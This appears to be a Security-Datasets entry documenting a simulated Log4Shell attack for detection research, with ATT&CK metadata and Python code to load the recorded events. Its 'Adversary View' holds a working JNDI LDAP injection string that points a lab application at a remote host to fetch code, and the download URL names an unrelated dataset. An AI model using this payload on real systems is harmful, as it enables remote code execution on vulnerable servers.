Log4jShell LDAP JNDI Lookup

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2021/12/14

Modification Date

2021/12/14

Tactics

TA0001,TA0002

Techniques

T1190,T1203

Tags

None

Dataset Description

The JNDI lookup feature of log4j allows variables to be retrieved via JNDI - Java Naming and Directory Interface. This is an API that that provides naming and directory functionality to Java applications.

Simulation Metadata

Tools

type

Name

Module

Manual

sh

sh

Adversary View

java -cp target/Log4jLabProject-1.0-SNAPSHOT-all.jar com.log4jshell.App '${jndi:ldap://192.168.2.6:1389/Run}'

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/linux/defense_evasion/host/sh_binary_padding_dd.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.head(1)